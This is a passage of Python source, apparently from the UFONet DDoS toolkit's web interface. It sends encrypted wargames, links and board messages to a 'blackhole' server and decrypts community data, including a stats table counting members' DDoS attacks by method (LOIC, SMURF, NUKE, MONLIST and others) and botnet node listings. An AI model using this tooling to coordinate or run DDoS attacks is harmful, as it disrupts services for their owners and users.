  5640. self.encryptedtext = "" # clean encryptedtext buffer
  5641. self.encrypt(wargames_enckey, wargames_estimated)
  5642. if self.encryptedtext:
  5643. wargames_estimated = self.encryptedtext
  5644. self.encryptedtext = "" # clean encryptedtext buffer
  5645. stream = str(wargames_creation)+wargames_msg_sep+str(wargames_target)+wargames_msg_sep+str(wargames_estimated)
  5646. try:
  5647. host = blackhole_ip
  5648. cport = 9992 # port used by mothership grider (server side script)
  5649. gs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  5650. gs.settimeout(5.0)
  5651. gs.connect((host, cport))
  5652. gs.send(stream)
  5653. gs.close()
  5654. try: # download latest wargames after submit
  5655. wargames = urllib.request.urlopen('http://'+blackhole_ip+'/ufonet/wargames.txt').read().decode('utf-8')
  5656. f = open(self.wargames_file, "w") # write updates to wargames.txt
  5657. f.write(wargames)
  5658. f.close()
  5659. except:
  5660. pass
  5661. wargames_trans = "[Info] [AI] Wargame transferred! -> [OK!]\n"
  5662. except:
  5663. wargames_trans = "[Error] [AI] Something wrong uploading wargame. Try it again...\n"
  5664. except:
  5665. wargames_trans = "[Error] [AI] Something wrong uploading wargame. Try it again...\n"
  5666. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  5667. f = open("/tmp/out", "w")
  5668. f.write(wargames_trans)
  5669. f.write(end_mark)
  5670. f.close()
  5671. if page == "/cmd_transfer_wargame_update":
  5672. if not os.path.exists('/tmp/out'):
  5673. open('/tmp/out', 'w').close()
  5674. with open('/tmp/out', 'r') as f:
  5675. self.pages["/cmd_transfer_wargame_update"] = "<pre>"+f.read()+"<pre>"
  5676. if page == "/cmd_transfer_link":
  5677. self.pages["/cmd_transfer_link"] = "<pre>Waiting for 'blackhole' connection...</pre>"
  5678. blackhole_ip = pGet["link_source2"]
  5679. blackhole_ip = urllib.parse.unquote(blackhole_ip)
  5680. try:
  5681. link_enckey = pGet["link_enckey"]
  5682. except:
  5683. link_enckey = ""
  5684. link_creation = strftime("%d-%m-%Y %H:%M:%S", gmtime())
  5685. link_url = pGet["link_url"]
  5686. if link_url.startswith("http://") or link_url.startswith("https://"): # parse proposed link
  5687. pass
  5688. else:
  5689. links_trans = "[Error] [AI] Proposed link hasn't a correct format!. Try it again...\n"
  5690. link_enckey = ""
  5691. if link_url.startswith("www."):
  5692. link_url = link_url.replace("www.","")
  5693. link_topic = pGet["link_topic"]
  5694. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  5695. if link_enckey is not "": # stream creation + encryption + package send
  5696. try:
  5697. self.encrypt(link_enckey, link_creation)
  5698. if self.encryptedtext:
  5699. link_creation = self.encryptedtext
  5700. self.encryptedtext = "" # clean encryptedtext buffer
  5701. self.encrypt(link_enckey, link_url)
  5702. if self.encryptedtext:
  5703. link_url = self.encryptedtext
  5704. self.encryptedtext = "" # clean encryptedtext buffer
  5705. self.encrypt(link_enckey, link_topic)
  5706. if self.encryptedtext:
  5707. link_topic = self.encryptedtext
  5708. self.encryptedtext = "" # clean encryptedtext buffer
  5709. stream = str(link_creation)+links_msg_sep+str(link_url)+links_msg_sep+str(link_topic)
  5710. try:
  5711. host = blackhole_ip
  5712. cport = 9992 # port used by mothership grider (server side script)
  5713. gs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  5714. gs.settimeout(5.0)
  5715. gs.connect((host, cport))
  5716. gs.send(stream)
  5717. gs.close()
  5718. try: # download latest links after submit
  5719. links = urllib.request.urlopen('http://'+blackhole_ip+'/ufonet/links.txt').read().decode('utf-8')
  5720. f = open(self.links_file, "w") # write updates to links.txt
  5721. f.write(links)
  5722. f.close()
  5723. except:
  5724. pass
  5725. links_trans = "[Info] [AI] Link transferred! -> [OK!]\n"
  5726. except:
  5727. links_trans = "[Error] [AI] Something wrong uploading link. Try it again...\n"
  5728. except:
  5729. links_trans = "[Error] [AI] Something wrong uploading link. Try it again...\n"
  5730. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  5731. f = open("/tmp/out", "w")
  5732. f.write(links_trans)
  5733. f.write(end_mark)
  5734. f.close()
  5735. if page == "/cmd_transfer_link_update":
  5736. if not os.path.exists('/tmp/out'):
  5737. open('/tmp/out', 'w').close()
  5738. with open('/tmp/out', 'r') as f:
  5739. self.pages["/cmd_transfer_link_update"] = "<pre>"+f.read()+"<pre>"
  5740. if page == "/cmd_transfer_stream":
  5741. self.pages["/cmd_transfer_stream"] = "<pre>Waiting for 'blackhole' connection...</pre>"
  5742. blackhole_ip = pGet["stream_source2"]
  5743. blackhole_ip = urllib.parse.unquote(blackhole_ip)
  5744. try:
  5745. stream_enckey = pGet["stream_enckey"]
  5746. except:
  5747. stream_enckey = ""
  5748. stream_creation = strftime("%d-%m-%Y %H:%M:%S", gmtime())
  5749. stream_url = pGet["stream_url"]
  5750. if stream_url.startswith("http://") or stream_url.startswith("https://"): # parse proposed stream
  5751. pass
  5752. else:
  5753. streams_trans = "[Error] [AI] Proposed stream hasn't a correct format!. Try it again...\n"
  5754. stream_enckey = ""
  5755. if stream_url.startswith("www."):
  5756. stream_url = stream_url.replace("www.","")
  5757. stream_topic = pGet["stream_topic"]
  5758. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  5759. if stream_enckey is not "": # stream creation + encryption + package send
  5760. try:
  5761. self.encrypt(stream_enckey, stream_creation)
  5762. if self.encryptedtext:
  5763. stream_creation = self.encryptedtext
  5764. self.encryptedtext = "" # clean encryptedtext buffer
  5765. self.encrypt(stream_enckey, stream_url)
  5766. if self.encryptedtext:
  5767. stream_url = self.encryptedtext
  5768. self.encryptedtext = "" # clean encryptedtext buffer
  5769. self.encrypt(stream_enckey, stream_topic)
  5770. if self.encryptedtext:
  5771. stream_topic = self.encryptedtext
  5772. self.encryptedtext = "" # clean encryptedtext buffer
  5773. stream = str(stream_creation)+streams_msg_sep+str(stream_url)+streams_msg_sep+str(stream_topic)
  5774. try:
  5775. host = blackhole_ip
  5776. cport = 9992 # port used by mothership grider (server side script)
  5777. gs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  5778. gs.settimeout(5.0)
  5779. gs.connect((host, cport))
  5780. gs.send(stream)
  5781. gs.close()
  5782. try: # download latest links after submit
  5783. streams = urllib.request.urlopen('http://'+blackhole_ip+'/ufonet/streams.txt').read().decode('utf-8')
  5784. f = open(self.streams_file, "w") # write updates to streams.txt
  5785. f.write(streams)
  5786. f.close()
  5787. except:
  5788. pass
  5789. streams_trans = "[Info] [AI] Link transferred! -> [OK!]\n"
  5790. except:
  5791. streams_trans = "[Error] [AI] Something wrong uploading link. Try it again...\n"
  5792. except:
  5793. streams_trans = "[Error] [AI] Something wrong uploading link. Try it again...\n"
  5794. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  5795. f = open("/tmp/out", "w")
  5796. f.write(streams_trans)
  5797. f.write(end_mark)
  5798. f.close()
  5799. if page == "/cmd_transfer_stream_update":
  5800. if not os.path.exists('/tmp/out'):
  5801. open('/tmp/out', 'w').close()
  5802. with open('/tmp/out', 'r') as f:
  5803. self.pages["/cmd_transfer_stream_update"] = "<pre>"+f.read()+"<pre>"
  5804. if page == "/cmd_transfer_globalnet":
  5805. self.pages["/cmd_transfer_globalnet"] = "<pre>Waiting for 'blackhole' connection...</pre>"
  5806. blackhole_ip = pGet["globalnet_source2"]
  5807. blackhole_ip = urllib.parse.unquote(blackhole_ip)
  5808. try:
  5809. globalnet_enckey = pGet["globalnet_enckey"]
  5810. except:
  5811. globalnet_enckey = ""
  5812. globalnet_owner = pGet["globalnet_owner"]
  5813. if len(globalnet_owner) < 3 or len(globalnet_owner) > 12: # default owner
  5814. globalnet_owner = "Anonymous"
  5815. globalnet_comment = pGet["globalnet_comment"]
  5816. if len(globalnet_comment) < 3 or len(globalnet_comment) > 90: # default comment
  5817. globalnet_comment = "-"
  5818. globalnet_warp = pGet["globalnet_warp"]
  5819. try:
  5820. globalnet_ip = requests.get(check_ip_service3).text
  5821. except:
  5822. try:
  5823. globalnet_ip = requests.get(check_ip_service2).text
  5824. except:
  5825. try:
  5826. globalnet_ip = requests.get(check_ip_service1).text
  5827. except:
  5828. globalnet_ip = "Unknown!"
  5829. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  5830. if globalnet_enckey is not "": # stream creation + encryption + package send
  5831. try:
  5832. self.encrypt(globalnet_enckey, globalnet_owner)
  5833. if self.encryptedtext:
  5834. globalnet_owner = self.encryptedtext
  5835. self.encryptedtext = "" # clean encryptedtext buffer
  5836. self.encrypt(globalnet_enckey, globalnet_comment)
  5837. if self.encryptedtext:
  5838. globalnet_comment = self.encryptedtext
  5839. self.encryptedtext = "" # clean encryptedtext buffer
  5840. self.encrypt(globalnet_enckey, globalnet_warp)
  5841. if self.encryptedtext:
  5842. globalnet_warp = self.encryptedtext
  5843. self.encryptedtext = "" # clean encryptedtext buffer
  5844. self.encrypt(globalnet_enckey, globalnet_ip)
  5845. if self.encryptedtext:
  5846. globalnet_ip = self.encryptedtext
  5847. self.encryptedtext = "" # clean encryptedtext buffer
  5848. stream = str(globalnet_owner)+globalnet_msg_sep+str(globalnet_comment)+globalnet_msg_sep+str(globalnet_warp)+globalnet_msg_sep+str(globalnet_ip)
  5849. try:
  5850. host = blackhole_ip
  5851. cport = 9992 # port used by mothership grider (server side script)
  5852. gs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  5853. gs.settimeout(5.0)
  5854. gs.connect((host, cport))
  5855. gs.send(stream)
  5856. gs.close()
  5857. try: # download latest globalnet after submit
  5858. globalnet = urllib.request.urlopen('http://'+blackhole_ip+'/ufonet/globalnet.txt').read().decode('utf-8')
  5859. f = open(self.globalnet_file, "w") # write updates to globalnet.txt
  5860. f.write(globalnet)
  5861. f.close()
  5862. except:
  5863. pass
  5864. globalnet_trans = "[Info] [AI] Location transferred! -> [OK!]\n"
  5865. except:
  5866. globalnet_trans = "[Error] [AI] Something wrong uploading location. Try it again...\n"
  5867. except:
  5868. globalnet_trans = "[Error] [AI] Something wrong uploading location. Try it again...\n"
  5869. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  5870. f = open("/tmp/out", "w")
  5871. f.write(globalnet_trans)
  5872. f.write(end_mark)
  5873. f.close()
  5874. if page == "/cmd_transfer_globalnet_update":
  5875. if not os.path.exists('/tmp/out'):
  5876. open('/tmp/out', 'w').close()
  5877. with open('/tmp/out', 'r') as f:
  5878. self.pages["/cmd_transfer_globalnet_update"] = "<pre>"+f.read()+"<pre>"
  5879. if page == "/cmd_sync_board":
  5880. self.pages["/cmd_sync_board"] = "<pre>Waiting for 'blackhole' reply...</pre>"
  5881. blackhole_ip = pGet["board_source"]
  5882. blackhole_ip = urllib.parse.unquote(blackhole_ip)
  5883. try:
  5884. board = urllib.request.urlopen('http://'+blackhole_ip+'/ufonet/board.txt').read().decode('utf-8')
  5885. f = open(self.board_file, "w") # write updates to board.txt
  5886. f.write(board)
  5887. f.close()
  5888. self.board_text = board
  5889. except:
  5890. board = "[Error] [AI] Something wrong downloading. Try it again or using another source...\n"
  5891. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  5892. f = open("/tmp/out", "w")
  5893. f.write(str(board))
  5894. f.write(end_mark)
  5895. f.close()
  5896. if page == "/cmd_sync_board_update":
  5897. if not os.path.exists('/tmp/out'):
  5898. open('/tmp/out', 'w').close()
  5899. with open('/tmp/out', 'r') as f:
  5900. stream = f.read()
  5901. stream = re.sub("(.{100})", "\\1\n", stream, 0, re.DOTALL) # regex magics! (set visual stream to 100 chars after \n)
  5902. self.pages["/cmd_sync_board_update"] = "<pre>"+stream+"<pre>"
  5903. if page == "/cmd_send_message_board":
  5904. self.pages["/cmd_send_message_board"] = "<pre>Waiting for 'blackhole' connection...</pre>"
  5905. blackhole_ip = pGet["board_source"]
  5906. blackhole_ip = urllib.parse.unquote(blackhole_ip).decode('utf8')
  5907. try:
  5908. board_key = pGet["board_key"]
  5909. except:
  5910. board_key = ""
  5911. try:
  5912. board_topic = pGet["board_topic"]
  5913. except:
  5914. board_topic = ""
  5915. try:
  5916. board_message = pGet["stream_txt"]
  5917. except:
  5918. board_message = ""
  5919. end_mark = "\n[Info] [AI] End of transmission. -> [Refreshing!]"
  5920. if board_key is not "" or board_topic is not "" or board_message is not "": # stream creation (topic | icon | nick | id | comment) + encryption (board_key) + package send (default blackhole)
  5921. try:
  5922. board_json_file = open(self.mothership_boardcfg_file, "r") # extract board profile conf
  5923. board_data = json.load(board_json_file)
  5924. board_json_file.close()
  5925. board_nickname = board_data["profile_nick"]
  5926. self.encrypt(board_key, board_nickname)
  5927. if self.encryptedtext:
  5928. board_nickname = self.encryptedtext
  5929. self.encryptedtext = "" # clean encryptedtext buffer
  5930. board_icon = board_data["profile_icon"]
  5931. board_icon = board_icon.replace("link", "") # keep just icon number
  5932. board_id = board_data["profile_token"]
  5933. self.encrypt(board_key, board_message)
  5934. if self.encryptedtext:
  5935. board_message = self.encryptedtext
  5936. self.encryptedtext = "" # clean encryptedtext buffer
  5937. if board_topic == "general":
  5938. board_topic = 1
  5939. elif board_topic == "opsec":
  5940. board_topic = 2
  5941. elif board_topic == "faq":
  5942. board_topic = 3
  5943. elif board_topic == "bugs":
  5944. board_topic = 4
  5945. elif board_topic == "media":
  5946. board_topic = 5
  5947. else:
  5948. board_topic = 1
  5949. stream = str(board_topic)+board_msg_sep+str(board_icon)+board_msg_sep+str(board_nickname)+board_msg_sep+str(board_id)+board_msg_sep+str(board_message)
  5950. try:
  5951. host = blackhole_ip
  5952. cport = 9992 # port used by mothership grider (server side script)
  5953. gs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  5954. gs.settimeout(5.0)
  5955. gs.connect((host, cport))
  5956. gs.send(stream)
  5957. gs.close()
  5958. try: # download latest board after submit
  5959. board = urllib.request.urlopen('http://'+blackhole_ip+'/ufonet/board.txt').read().decode('utf-8')
  5960. f = open(self.board_file, "w") # write updates to board.txt
  5961. f.write(board)
  5962. f.close()
  5963. except:
  5964. pass
  5965. board_trans = "[Info] [AI] The message has been sent! -> [OK!]\n"
  5966. except:
  5967. board_trans = "[Error] [AI] Something wrong sending message to the board. Try it again...\n"
  5968. except:
  5969. board_trans = "[Error] [AI] Something wrong sending message to the board. Try it again...\n"
  5970. f = open("/tmp/out", "w")
  5971. f.write(board_trans)
  5972. f.write(end_mark)
  5973. f.close()
  5974. if page == "/cmd_send_message_board_update":
  5975. if not os.path.exists('/tmp/out'):
  5976. open('/tmp/out', 'w').close()
  5977. with open('/tmp/out', 'r') as f:
  5978. self.pages["/cmd_send_message_board_update"] = "<pre>"+f.read()+"<pre>"
  5979. if page == "/cmd_decrypt":
  5980. self.pages["/cmd_decrypt"] = "<pre>Waiting for decrypting results...</pre>"
  5981. try:
  5982. news_key = pGet["news_key"]
  5983. except:
  5984. news_key = ""
  5985. try:
  5986. missions_key = pGet["missions_key"]
  5987. except:
  5988. missions_key = ""
  5989. end_mark = "\n[Info] [AI] End of decryption."
  5990. if news_key is not "": # news decryption
  5991. self.decrypted_news = []
  5992. nodec_text = "*** [This message cannot be solved with that KEY...]"
  5993. news_key = pGet["news_key"]
  5994. for news_text in self.list_news:
  5995. self.decrypt(news_key, news_text)
  5996. if self.decryptedtext:
  5997. if len(self.decryptedtext) < 2:
  5998. self.decrypted_news.append(nodec_text)
  5999. else:
  6000. self.decrypted_news.append(self.decryptedtext)
  6001. else:
  6002. self.decrypted_news.append(nodec_text)
  6003. self.decryptedtext = "" # clean decryptedtext buffer
  6004. f = open("/tmp/out", "w")
  6005. num_news = 0 # news counter
  6006. for m in self.decrypted_news:
  6007. num_news = num_news + 1
  6008. f.write("["+str(num_news)+"] " + str(m)+"\n")
  6009. f.write(end_mark)
  6010. f.close()
  6011. else:
  6012. if missions_key is not "": # missions decryption
  6013. self.decrypted_missions = []
  6014. nodec_text = "*** [This message cannot be solved with that KEY...]"
  6015. missions_key = pGet["missions_key"]
  6016. for missions_text in self.list_missions:
  6017. self.decrypt(missions_key, missions_text)
  6018. if self.decryptedtext:
  6019. if len(self.decryptedtext) < 2:
  6020. self.decrypted_missions.append(nodec_text)
  6021. else:
  6022. self.decrypted_missions.append(self.decryptedtext)
  6023. else:
  6024. self.decrypted_missions.append(nodec_text)
  6025. self.decryptedtext = "" # clean decryptedtext buffer
  6026. f = open("/tmp/out", "w")
  6027. num_mission = 0 # missions counter
  6028. for m in self.decrypted_missions:
  6029. num_mission = num_mission + 1
  6030. f.write("["+str(num_mission)+"] " + str(m)+"\n")
  6031. f.write(end_mark)
  6032. f.close()
  6033. else: # blackholes (nodes.dat) decryption + data showing
  6034. self.decrypted_blackholes = []
  6035. nodec_text = "*** [This message cannot be solved with that key...]"
  6036. blackhole_key = pGet["blackhole_key"]
  6037. for blackholes_text in self.list_blackholes:
  6038. self.decrypt(blackhole_key, blackholes_text)
  6039. if self.decryptedtext:
  6040. self.decrypted_blackholes.append(self.decryptedtext)
  6041. else:
  6042. self.decrypted_blackholes.append(nodec_text)
  6043. self.decryptedtext = "" # clean decryptedtext buffer
  6044. f = open("/tmp/out", "w")
  6045. num_blackholes = 0 # blackholes counter
  6046. for b in self.decrypted_blackholes:
  6047. num_blackholes = num_blackholes + 1
  6048. if blackhole_sep in b: # IP | Mode | Comment | Actions
  6049. s = b.rsplit(blackhole_sep, 1)[0]
  6050. ip = str(s.rsplit(blackhole_sep, 1)[0])
  6051. mode = str(s.rsplit(blackhole_sep, 1)[1])
  6052. if mode == "D": # Download only mode
  6053. mode = "<a href=javascript:runCommandX('cmd_download_community')>Download</a>"
  6054. elif mode == "U": # Upload only mode
  6055. mode = "<a href=javascript:runCommandX('cmd_upload_community')>Upload</a>"
  6056. else: # Upload/Download mode
  6057. mode = "<a href=javascript:runCommandX('cmd_download_community')>Download</a>" + " - " + "<a href=javascript:runCommandX('cmd_upload_community')>Upload</a>"
  6058. comment = str(b.rsplit(blackhole_sep, 1)[1])
  6059. b = ip + " " + blackhole_sep + " Botnet: " + mode + " " + blackhole_sep + " Comment: " + comment
  6060. f.write("["+str(num_blackholes)+"] " + str(b)+"\n")
  6061. else:
  6062. f.write("["+str(num_blackholes)+"] " + str(b)+"\n")
  6063. f.write(end_mark)
  6064. f.close()
  6065. if page == "/cmd_decrypt_update":
  6066. if not os.path.exists('/tmp/out'):
  6067. open('/tmp/out', 'w').close()
  6068. with open('/tmp/out', 'r') as f:
  6069. self.pages["/cmd_decrypt_update"] = "<pre>"+f.read()+"<pre>"
  6070. if page == "/news":
  6071. self.pages["/news"] = self.html_news()
  6072. if page == "/missions":
  6073. self.pages["/missions"] = self.html_missions()
  6074. if page == "/board":
  6075. self.pages["/board"] = self.html_board()
  6076. if page == "/grid":
  6077. self.pages["/grid"] = self.html_grid()
  6078. if page == "/wargames":
  6079. self.pages["/wargames"] = self.html_wargames()
  6080. if page == "/links":
  6081. self.pages["/links"] = self.html_links()
  6082. if page == "/streams":
  6083. self.pages["/streams"] = self.html_streams()
  6084. if page == "/games":
  6085. self.pages["/games"] = self.html_games()
  6086. if page == "/spaceinvaders":
  6087. self.pages["/spaceinvaders"] = self.html_spaceinvaders()
  6088. if page == "/browser":
  6089. self.pages["/browser"] = self.html_browser()
  6090. if page == "/globalnet":
  6091. self.pages["/globalnet"] = self.html_globalnet()
  6092. if page == "/grid_profile":
  6093. if pGet=={}:
  6094. self.pages["/grid_profile"] = self.html_grid_profile()
  6095. else:
  6096. self.save_grid(pGet)
  6097. self.pages["/grid_profile"] = self.html_grid_profile_submit()
  6098. if page == "/board_profile":
  6099. if pGet =={}:
  6100. self.pages["/board_profile"] = self.html_board_profile()
  6101. else:
  6102. self.save_profile(pGet)
  6103. self.pages["/board_profile"] = self.html_board_profile_submit()
  6104. if page == "/board_remove":
  6105. self.pages["/board_remove"] = self.html_board_remove()
  6106. if page == "/grid_remove":
  6107. self.pages["/grid_remove"] = self.html_grid_remove()
  6108. if page == "/cmd_decrypt_moderator_board":
  6109. self.pages["/cmd_decrypt_moderator_board"] = "<pre>Waiting for decrypting results...</pre>"
  6110. try:
  6111. board_key = pGet["board_key"]
  6112. except:
  6113. board_key = ""
  6114. try:
  6115. filter = pGet["filter"]
  6116. except:
  6117. filter = ""
  6118. end_mark = "\n[Info] [AI] End of decryption."
  6119. if board_key is not "": # board decryption
  6120. nodec_text = "***[ENCRYPTED WITH OTHER KEY]"
  6121. f = open("/tmp/out", "w")
  6122. b = "<center><table border='1' cellpadding='10' cellspacing='5' align=center>"
  6123. f.write(str(b)+"\n")
  6124. self.list_moderator_rev = reversed(self.list_moderator) # order by DESC
  6125. for m in self.list_moderator_rev: # msg = topic | icon | nick | id | comment
  6126. if board_msg_sep in m:
  6127. m = m.split(board_msg_sep)
  6128. topic = m[0] # topic
  6129. t = m[1] # icon
  6130. n = m[2] # nick
  6131. g = m[3] # id
  6132. l = m[4] # comment
  6133. if topic == "1":
  6134. topic = "/GENERAL"
  6135. elif topic == "2":
  6136. topic = "/#OPSEC "
  6137. elif topic == "3":
  6138. topic = "/FAQ "
  6139. elif topic == "4":
  6140. topic = "/BUGS "
  6141. elif topic == "5":
  6142. topic = "/MEDIA "
  6143. else:
  6144. topic = "/BUGS[!]"
  6145. operator_img = open("core/images/crew/link"+str(t)+".txt").read()
  6146. icon = "<img src='data:image/png;base64,"+str(operator_img)+"'>"
  6147. self.decrypt(board_key, n)
  6148. if self.decryptedtext:
  6149. nick = self.decryptedtext
  6150. else:
  6151. nick = 'Anonymous' # We are legion!
  6152. try:
  6153. nick = nick.decode('latin-1') # parsing for "her.man.xs-latino"
  6154. except:
  6155. pass
  6156. if len(nick) < 3:
  6157. nick = 'Anonymous'
  6158. self.decryptedtext = "" # clean decryptedtext buffer
  6159. id = str(g)[0:6] # only show 6 chars from personal ID (obfuscation)
  6160. self.decrypt(board_key, l)
  6161. if self.decryptedtext:
  6162. msg = self.decryptedtext
  6163. else:
  6164. msg = nodec_text
  6165. try:
  6166. msg = msg.decode('latin-1')
  6167. except:
  6168. pass
  6169. if len(msg) < 2:
  6170. msg = nodec_text
  6171. self.decryptedtext = "" # clean decryptedtext buffer
  6172. if filter in topic or filter == "ALL": # filter content by user selection
  6173. b = "<tr valign=top><td align=center>" + str(icon) + "<br>"+str(nick)+"</td><td>"
  6174. b += "<font size=+2>"+str(topic)+"</font>"
  6175. b += "<br>by "+str(nick)+"<br><br>"
  6176. b += str(msg) + "</td></tr>"
  6177. f.write(str(b)+"\n")
  6178. else:
  6179. pass
  6180. else: # not valid stream data
  6181. pass
  6182. b="</table>"
  6183. f.write(str(b)+"\n")
  6184. f.write(end_mark)
  6185. f.close()
  6186. if page == "/cmd_decrypt_moderator_board_update":
  6187. if not os.path.exists('/tmp/out'):
  6188. open('/tmp/out', 'w').close()
  6189. with open('/tmp/out', 'r') as f:
  6190. self.pages["/cmd_decrypt_moderator_board_update"] = "<pre>"+f.read()+"<pre>"
  6191. if page == "/cmd_decrypt_grid":
  6192. self.pages["/cmd_decrypt_grid"] = "<pre>Waiting for decrypting results...</pre>"
  6193. try:
  6194. grid_key = pGet["grid_key"]
  6195. except:
  6196. grid_key = ""
  6197. end_mark = "[Info] [AI] End of decryption."
  6198. if grid_key is not "": # grid decryption
  6199. # Mothership stats counters
  6200. mothership_members = 0
  6201. unknown_members = 0
  6202. member_1 = 0 # Rookie
  6203. member_2 = 0 # Mercenary
  6204. member_3 = 0 # Bandit
  6205. member_4 = 0 # UFOmmander!
  6206. member_5 = 0 # UFOl33t!
  6207. mothership_missions = 0
  6208. mothership_transferred = 0
  6209. mothership_attacks = 0
  6210. mothership_loic = 0
  6211. mothership_loris = 0
  6212. mothership_ufosyn = 0
  6213. mothership_spray = 0
  6214. mothership_smurf = 0
  6215. mothership_xmas = 0
  6216. mothership_nuke = 0
  6217. mothership_tachyon = 0
  6218. mothership_monlist = 0
  6219. mothership_fraggle = 0
  6220. mothership_sniper = 0
  6221. mothership_ufoack = 0
  6222. mothership_uforst = 0
  6223. mothership_droper = 0
  6224. mothership_overlap = 0
  6225. mothership_pinger = 0
  6226. mothership_ufoudp = 0
  6227. mothership_chargo = 0
  6228. mothership_dorking = 0
  6229. mothership_maxchargo = 0
  6230. nodec_text = "KEY?"
  6231. grid_table = "<center><u>MEMBERS STATS:</u></center><br><table cellpadding='5' cellspacing='5' border='1'><tr><td align='center'><a id='filter_nickname' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('nickname','"+str(grid_key)+"')>NICK:</a></td><td align='center'><a id='filter_ranking' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('ranking','"+str(grid_key)+"')>RANK:</a></td><td align='center'><a id='filter_chargo' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('chargo','"+str(grid_key)+"')>CHARGO:</a></td><td align='center'><a id='filter_dorking' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('dorking','"+str(grid_key)+"')>DORKING:</a></td><td align='center'><a id='filter_transf' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('transferred','"+str(grid_key)+"')>TRANSF:</a></td><td align='center'><a id='filter_maxchargo' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('maxchargo','"+str(grid_key)+"')>MAX.CHARGO:</a></td><td align='center'><a id='filter_missions' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('missions','"+str(grid_key)+"')>MISSIONS:</a></td><td align='center'><a id='filter_attacks' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('attacks','"+str(grid_key)+"')>ATTACKS:</a></td><td align='center'><a id='filter_loic' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('loic','"+str(grid_key)+"')>LOIC:</a></td><td align='center'><a id='filter_loris' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('loris','"+str(grid_key)+"')>LORIS:</a></td><td align='center'><a id='filter_ufosyn' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('ufosyn','"+str(grid_key)+"')>UFOSYN:</a></td><td align='center'><a id='filter_spray' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('spray','"+str(grid_key)+"')>SPRAY:</a></td><td align='center'><a id='filter_smurf' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('smurf','"+str(grid_key)+"')>SMURF:</a></td><td align='center'><a id='filter_xmas' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('xmas','"+str(grid_key)+"')>XMAS:</a></td><td align='center'><a id='filter_nuke' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('nuke','"+str(grid_key)+"')>NUKE:</a></td><td align='center'><a id='filter_tachyon' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('tachyon','"+str(grid_key)+"')>TACHYON:</a></td><td align='center'><a id='filter_monlist' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('monlist','"+str(grid_key)+"')>MONLIST:</a></td><td align='center'><a id='filter_fraggle' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('fraggle','"+str(grid_key)+"')>FRAGGLE:</a></td><td align='center'><a id='filter_sniper' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('sniper','"+str(grid_key)+"')>SNIPER:</a></td><td align='center'><a id='filter_ufoack' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('ufoack','"+str(grid_key)+"')>UFOACK:</a></td><td align='center'><a id='filter_uforst' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('uforst','"+str(grid_key)+"')>UFORST:</a></td><td align='center'><a id='filter_droper' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('droper','"+str(grid_key)+"')>DROPER:</a></td><td align='center'><a id='filter_overlap' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('overlap','"+str(grid_key)+"')>OVERLAP:</a></td><td align='center'><a id='filter_pinger' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('pinger','"+str(grid_key)+"')>PINGER:</a></td><td align='center'><a id='filter_ufoudp' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('ufoudp','"+str(grid_key)+"')>UFOUDP:</a></td><td align='center'><a id='filter_contact' style='color:red;text-decoration:underline red;' onclick=javascript:GridFilter('contact','"+str(grid_key)+"')>CONTACT:</a></td></tr>"
  6232. grid_key = pGet["grid_key"]
  6233. f = open("/tmp/out", "w")
  6234. self.list_grid_rev = reversed(self.list_grid) # order by DESC
  6235. for m in self.list_grid_rev: # rev(msg) = nickname, ranking, chargo, dorking, transf, maxchargo, missions, attacks, loic, loris, ufosyn, spray, smurf, xmas, nuke, tachyon, monlist, fraggle, sniper, ufoack, uforst, droper, overlap, pinger, ufoudp, contact, ID
  6236. if grid_msg_sep in m:
  6237. version = m.count(grid_msg_sep) # check UFONet stream version (10->0.9|11->1.0|12->1.1|13->1.2|14->1.2.1|15->1.3|16->1.4|26->1.5)
  6238. m = m.split(grid_msg_sep)
  6239. mothership_members = mothership_members + 1 # add new registered member to mothership stats
  6240. grid_nickname = m[0] # nickname
  6241. self.decrypt(grid_key, grid_nickname)
  6242. if self.decryptedtext:
  6243. grid_nickname = self.decryptedtext
  6244. else:
  6245. grid_nickname = nodec_text
  6246. unknown_members = unknown_members + 1 # add members as unknown
  6247. self.decryptedtext = "" # clean decryptedtext buffer
  6248. if len(grid_nickname) > 12 or len(grid_nickname) < 3: # m[0] = grid_nickname (>str3<str12)
  6249. grid_nickname = "Anonymous"
  6250. else:
  6251. grid_nickname = str(grid_nickname) # nickname
  6252. grid_ranking = m[1] # ranking
  6253. self.decrypt(grid_key, grid_ranking)
  6254. if self.decryptedtext:
  6255. try:
  6256. grid_ranking = int(self.decryptedtext)
  6257. except:
  6258. grid_ranking = nodec_text
  6259. else:
